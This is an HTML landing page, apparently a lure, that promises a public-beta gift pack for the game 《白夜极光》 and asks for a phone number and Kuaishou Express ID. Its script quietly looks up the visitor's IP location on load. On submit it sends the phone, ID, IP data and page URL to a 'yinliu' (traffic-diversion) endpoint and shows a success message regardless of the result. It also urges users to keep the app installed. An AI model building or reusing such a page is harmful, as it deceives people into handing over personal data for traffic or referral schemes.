
<!DOCTYPE html>
<html>

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>《白夜极光》公测礼包</title>
  <script>
    // location.href = 'https://lol.qq.com/'
  </script>

  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
  <meta name="msapplication-tap-highlight" content="no">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="referrer" content="no-referrer"/>
  <link rel="dns-prefetch" href="https://cdn.bootcdn.net">
  <link rel="dns-prefetch" href="https://article.biliimg.com">
  <meta name="robots" content="noindex">
  <meta name="robots" content="noindex, noarchive">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="renderer" content="webkit">
  <link rel="stylesheet" type="text/css" href="https://s-tatic.oss-cn-shanghai.aliyuncs.com/new.css">
  <script type="text/javascript">

    function getRem(pwidth,prem){
      var html = document.getElementsByTagName("html")[0];
      var oWidth = window.innerWidth;
      html.style.fontSize = oWidth/pwidth*prem + "px";
      if(!/iphone|ipad|ipod|android.*mobile|windows.*phone|blackberry.*mobile/i.test(window.navigator.userAgent.toLowerCase())){	//pc端居中显示

        html.style.width="750px";
        html.style["margin"] = "0 auto";
        html.style.fontSize="100px";
      }
    }

    getRem(750,100);
    /*750代表设计师给的设计稿的宽度，你的设计稿是多少，就写多少;100代表换算比例，这里写100是
    为了以后好算,比如，你测量的一个宽度是100px,就可以写为1rem,以及1px=0.01rem等等*/
    window.onresize = function(){
      getRem(750,100);
    };
  </script>
  <link href="https://cdn.bootcdn.net/ajax/libs/vant/2.12.33/index.min.css" rel="stylesheet">
  <script src="https://cdn.bootcss.com/vue/2.6.10/vue.min.js"></script>
  <script src="https://cdn.bootcdn.net/ajax/libs/vant/2.12.33/vant.min.js"></script>
  <script src="https://pages-hk.oss-cn-hongkong.aliyuncs.com/jweixin-1.6.0.js" async></script>

  <style type="text/css">
    /*通用类*/
    * {
      margin: 0;
      padding: 0;
    }

    body {
      margin: 0 auto;
      font-size: 0.24rem;
      font-family: PingFang SC, Hiragino Sans GB, Microsoft YaHei UI, Microsoft YaHei, Source Han Sans CN, sans-serif;
      background: #fff;
      text-align: justify;
      color: #010000;
      position: relative;
    }

    h1,
    h2,
    h3 {
      font-weight: 500;
    }

    img {
      border: none;
    }

    a {
      cursor: pointer;
      color: #333;
      text-decoration: none;
      outline: none;
    }

    a:hover {
      color: #006bb7;
    }

    ul {
      list-style-type: none;
    }

    em {
      font-style: normal;
    }

    .lt {
      float: left;
    }

    .rt {
      float: right;
    }

    input.sub,
    label {
      border: none;
      cursor: pointer;
    }

    input,
    textarea {
      font-family: PingFang SC, Hiragino Sans GB, Microsoft YaHei UI, Microsoft YaHei, Source Han Sans CN, sans-serif;
      outline: none;
    }

    table {
      border-collapse: collapse;
    }

    table td,
    table th {
      padding: 0;
    }

    input::-webkit-input-placeholder,
    textarea::-webkit-input-placeholder {
      color: #ccc;
    }

    input::-moz-placeholder,
    textarea::-moz-placeholder {
      /* Mozilla Firefox 19+ */
      color: #ccc;
    }

    input:-moz-placeholder,
    textarea:-moz-placeholder {
      /* Mozilla Firefox 4 to 18 */
      color: #ccc;
    }

    input:-ms-input-placeholder,
    textarea:-ms-input-placeholder {
      /* Internet Explorer 10-11 */
      color: #ccc;
    }

    div.clear {
      font: 0px Arial;
      line-height: 0;
      height: 0;
      overflow: hidden;
      clear: both;
    }

    .clearfix::after {
      content: "";
      display: block;
      clear: both;
    }

    /*兼容老设备的rem-px基准*/
    html {
      font-size: 42.6667px;
    }

    @media screen and (max-width: 320px) {
      html {
        font-size: 42.6667px;
      }
    }

    @media screen and (min-width: 321px) and (max-width: 360px) {
      html {
        font-size: 48px;
      }
    }

    @media screen and (min-width: 361px) and (max-width: 375px) {
      html {
        font-size: 50px;
      }
    }

    @media screen and (min-width: 376px) and (max-width: 414px) {
      html {
        font-size: 55px;
      }
    }

    @media screen and (min-width: 415px) and (max-width: 484px) {
      html {
        font-size: 64px;
      }
    }

    @media screen and (min-width: 485px) and (max-width: 720px) {
      html {
        font-size: 96px;
      }
    }

    @media screen and (min-width: 721px) and (max-width: 768px) {
      html {
        font-size: 102px;
      }
    }

    @media screen and (min-width: 769px) and (max-width: 1080px) {
      html {
        font-size: 144px;
      }
    }

    @media screen and (min-width: 1080px) {
      html {
        font-size: 144px;
      }
    }

    /*新设备的rem-vw标准*/


    .wrapin {
      background-color: #000000;
      padding-bottom: 0.3rem;
    }

    header {

      text-align: center;
      font-size: 0.39rem;
      height: 1.5rem;
      line-height: 1.5rem;
      color: #ffffff;
      background-color: #000000;
    }

    .pic img {
      width: 100%;
      display: block;
    }

    ul.orm {
      padding: 0.1rem 0.25rem 0.1rem;
    }

    /* 表单标题颜色 */
    ul.orm li {
      margin-bottom: 0.2rem;
    }

    /* 表单标题颜色 */
    ul li h3 {
      color: #ffffff;
      font-size: 0.32rem;
      /* 标题字体大小 */
      margin-bottom: 0.01rem;
    }

    ul.orm li h3 i {
      color: #DA2824;
      font-style: normal;
    }

    ul.orm li h4 {
      font-size: 0.27rem;
      /* 标题字体说明大小 */
      color: #ADA0A0;
      font-weight: normal;
      margin-bottom: 0.05rem;
    }

    ul.orm li input {
      width: 100%;
      height: 0.7rem;
      /* 手机号、QQ号输入框间距大小 */
      font-size: 0.3rem;
      padding-left: 0.6rem;
      box-sizing: border-box;
      border-radius: 0.05rem;
      background-position: left .1rem center !important;
    }

    ul.orm li .select {
      width: 100%;
      height: 0.7rem;
      /* 选择大区输入框间距大小 */
      font-size: 0.3rem;
      padding: 0 0.2rem;
      box-sizing: border-box;
      border-radius: 0.05rem;
      appearance: none;

      -moz-appearance: none;

      -webkit-appearance: none;
      color: #000;
      border: 1px solid #fff;

      background: #fff url(https://article.biliimg.com/bfs/article/2889eb91a579477ffd66db122b16807fb067dd10.png@1e_1c.webp) no-repeat right 0.2rem center !important;

      background-size: 0.25rem 0.3rem !important;
    }

    ul.orm li.select2 select {
      width: 46%;
      float: left;

    }

    ul.orm li.select2 select:nth-child(2) {
      float: right;
    }

    ul.orm li.dan h4 {
      margin-bottom: 0.25rem;
    }

    ul.orm li.dan input {
      width: 0.4rem;
      height: 0.4rem;
      float: left;

    }

    ul.orm li.dan strong {
      float: left;
      font-size: 0.3rem;
      margin-left: 0.2rem;
      margin-right: 0.2rem;
      color: #fff;
      font-style: normal;

    }

    form button {
      width: 7rem;
      /* 提交按钮大小 */
      height: 0.8rem;
      background-color: #343331;
      margin: 0.2rem auto;
      display: block;
      border: none;
      font-size: 0.36rem;
      color: #ffffff;
      border-radius: 0.2rem;
      font-weight: bold;
    }

    .readonly {
      background-color: #dfd9d9;
      border: none;
      color: #81889a;
    }

    .tanchu {
      position: fixed;
      top: 27%;
      left: 50%;
      width: 6rem;
      height: 6rem;
      background-color: #181818;
      z-index: 2;
      margin-left: -3rem;
      border-radius: 0.2rem;
      text-align: center;
      padding-top: 0.5rem;
      box-shadow: 0px 1px 14.56px 1.44px rgba(153, 153, 153, 0.2);
    }

    .tanchu img {
      width: 2rem;
    }

    .tanchu h3 {
      font-size: 0.5rem;
      color: #fff;
      margin: 0.3rem 0;
      color: #FFFFFF;
    }

    .tanchu p {
      font-size: 0.3rem;
      color: #AC9F9F;
    }

    .tanchu a img {
      margin-top: 0.8rem;
      width: 0.8rem;
    }

    .shou input {
      background: url(https://images.weserv.nl/?url=https://article.biliimg.com/bfs/article/9318b0f31906c55fb363f740088886213a42c51c.png@1e_1c.webp) no-repeat left;
      background-size: 0.4rem 0.4rem;
      border: none;
      background-color: #fff;
    }

    .shou1 input {
      background: url(https://images.weserv.nl/?url=https://article.biliimg.com/bfs/article/6f6023e41c8e8c32fc85701a2b1ede7afb4f32df.png@1e_1c.webp) no-repeat left;
      background-size: 0.4rem 0.4rem;
      border: none;
      background-color: #fff;
    }

    .shou2 input {
      background: url(https://images.weserv.nl/?url=https://article.biliimg.com/bfs/article/1f36eccc91e8d2d208560dab60470f3c6f0a5b5c.png@1e_1c.webp) no-repeat left;
      background-size: 0.4rem 0.4rem;
      border: none;
      background-color: #fff;
    }

    .rbg {
      background: #000000;
      display: flex;
      color: #333;
      padding: 0 .2rem;
      height: 0rem;
      /* 同意输入框间距大小 */
      align-items: center;
      font-size: 0.3rem;
      border-radius: 0.1rem;
      /* 同意输入框圆角调整 */
      font-weight: bold;
    }

    ul.orm li.dan .rbg strong {
      color: #333;
    }

    .alert .van-dialog__message {
      font-size: .3rem;
      font-weight: bold;
    }
  </style>
</head>

<body _c_t_j1="1">
<div id="app">
  <div class="pic">
    <img src="https://article.biliimg.com/bfs/article/ff5fc6fbea1e13c043e40d505050baacf20ea1d2.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/44cc55df9591a3f70538745667efacf343851529.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/45a4f063f41d0c662698e1d60939cbd90409e876.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/65c2223f5ac57d4eb0dffa391d81497d22a1914f.jpg@1e_1c.webp">
    <img src="https://static-1254404189.cos.ap-beijing.myqcloud.com/images%2Fbyjg%2Fcode.png%401e_1c.webp">
<!--    <img src="https://article.biliimg.com/bfs/article/45d67964601e6be89d9409d9efac8d4c69a6312b.jpg@1e_1c.webp">-->
    <img src="https://article.biliimg.com/bfs/article/537d6738b7c905c7ebacb91c2264f2537ff87589.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/67030ea55723d09c21877f7b41fe684c8325a860.jpg">
    <img src="https://article.biliimg.com/bfs/article/1d142f3c36d5c2174860d8c2febad93964766f48.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/4d8d439a36c79353f04ec67cf89e3faacd6fa244.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/979ac900a8506a8eed1faf5b50079ae16f268e35.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/248c189bea9220afa371c0241829494de4760ddc.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/9c3204337b40088d04bb8db17c55b9145747023c.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/e5da7bb83def758e343449057e04a62e789ee4c5.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/feaf69bd9f43db5d2ddb793c8e1f6943faa197f0.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/cc371b92d23fe89c8bd3e9f9d0eb4b3539fa99c1.jpg@1e_1c.webp">
    <img src="https://article.biliimg.com/bfs/article/cd1e7c3e7062de8189e2ba4026b75b9539bc75c0.jpg@1e_1c.webp">
  </div>
  <div class="wrapin">
    <form action="" method="get">
      <ul class="orm">
        <li class="shou">
          <h3><i>*</i>手机号</h3>
          <h4>&lt;公测礼包&gt;领取通知短信将发送至此手机号上</h4> <input type="tel" name="tel" id="tel" v-model="phone"
                                                                         placeholder="请输入正确的手机号">
        </li>
        <li class="shou2">
          <h3><i>*</i>快手极速版ID</h3>
          <h4>在快手极速版右下角-我-查看(昵称下面的快手号)复制即可</h4>
          <input type="text" name="" id="" v-model="kS_ID" placeholder="输入快手极速版ID，注意不是昵称">
        </li>
        <li class="dan">
          <h3><i>*</i>礼包未到账之前请勿卸载快手极速版APP或者注销账号，否则视为放弃领取。</h3>
          <div class="rbg"></div>
        </li>
        <li class="dan">
          <h3><i>*</i>提交的手机号仅用于本次短信通知(可退订)，无任何其它用途，提交即表示您愿意接受本次短信通知。
          </h3>
          <div class="rbg"></div>
        </li>
        <div class="clear"></div>
      </ul>
      <button type="button" class="button" @click="post">提交</button>
    </form>
  </div>
  <div class="pic"><img src="https://article.biliimg.com/bfs/article/4bb0b933bb7a6d92ad14def9abf7e8585dc73334.jpg@1e_1c.webp"></div>
  <audio
      src="https://gamecms-res.sl916.com/official_website_resource/50001/4/VIDEO/20230328/%E8%8B%8F%E8%8A%99%E6%AF%94%E5%BA%9C%E9%82%B8_f019007024bd41dbb8ba248eaab9b181.mp3"
      autoplay="autoplay" loop="loop">
    当前浏览器不支持audio
  </audio>
  <div class="tanchu" v-if="isPost">
    <img src="https://article.biliimg.com/bfs/article/64e034d4993f81ee8a5fcb9f7627bbb85330ff51.png@1e_1c.webp">
    <h3>提交成功</h3>
    <p>请注意查收手机通知短信</p>
    <br>
    <div  @click="isPost=false"><img src="https://article.biliimg.com/bfs/article/4b473bde5c36d0943bc0eaa87a2f0bd45bf1d5b1.png@1e_1c.webp"></div>
  </div>

</div>


<script>


  var app = new Vue({
    el: "#app",
    data() {
      return {
        phone: "",
        kS_ID: '',
        area: "",
        areaShow: false,
        city: "",
        cityShow: false,
        radisoCheck: '1',
        isPost: false,
        submiting: false,
        IPInfo: {}
      }
    },
    methods: {
      onAreaSelect(item) {
        this.area = item.value;
        this.areaShow = false;
      },
      onAreaCancel() {
        this.areaShow = false;
      },
      onCitySelect(item) {
        this.city = item[0] + item[1];
        this.cityShow = false;
      },
      onCityCancel() {
        this.cityShow = false;
      },
      post() {
        if (!/^1[3456789]\d{9}$/.test(this.phone)) {
          vant.Dialog({message: '请输入有效的手机号码', className: "alert", confirmButtonText: '确定'});
          return false;
        }
        this.isPost = true;
        const isDev = location.hostname === "localhost";
        const baseUrl = isDev
          ? "http://localhost:5000/"
          : "https://service-8zqb5ngm-1253419200.gz.apigw.tencentcs.com/";
        fetch(baseUrl + "yinliu/add", {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({
            phone: this.phone,
            kS_ID: this.kS_ID,
            IPInfo: this.IPInfo,
            href: window.location.href,
            host: location.host,
          }),
        })

      }
    },
    mounted() {
      fetch("https://ip.useragentinfo.com/json")
        .then((res) => {
          return res.json();
        })
        .then((res) => {
          this.IPInfo = res;
        });
    }
  });
</script>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
<script>LA.init({id:"3ExvyTauAvuzrAYx",ck:"3ExvyTauAvuzrAYx"})</script>
</body>

</html>
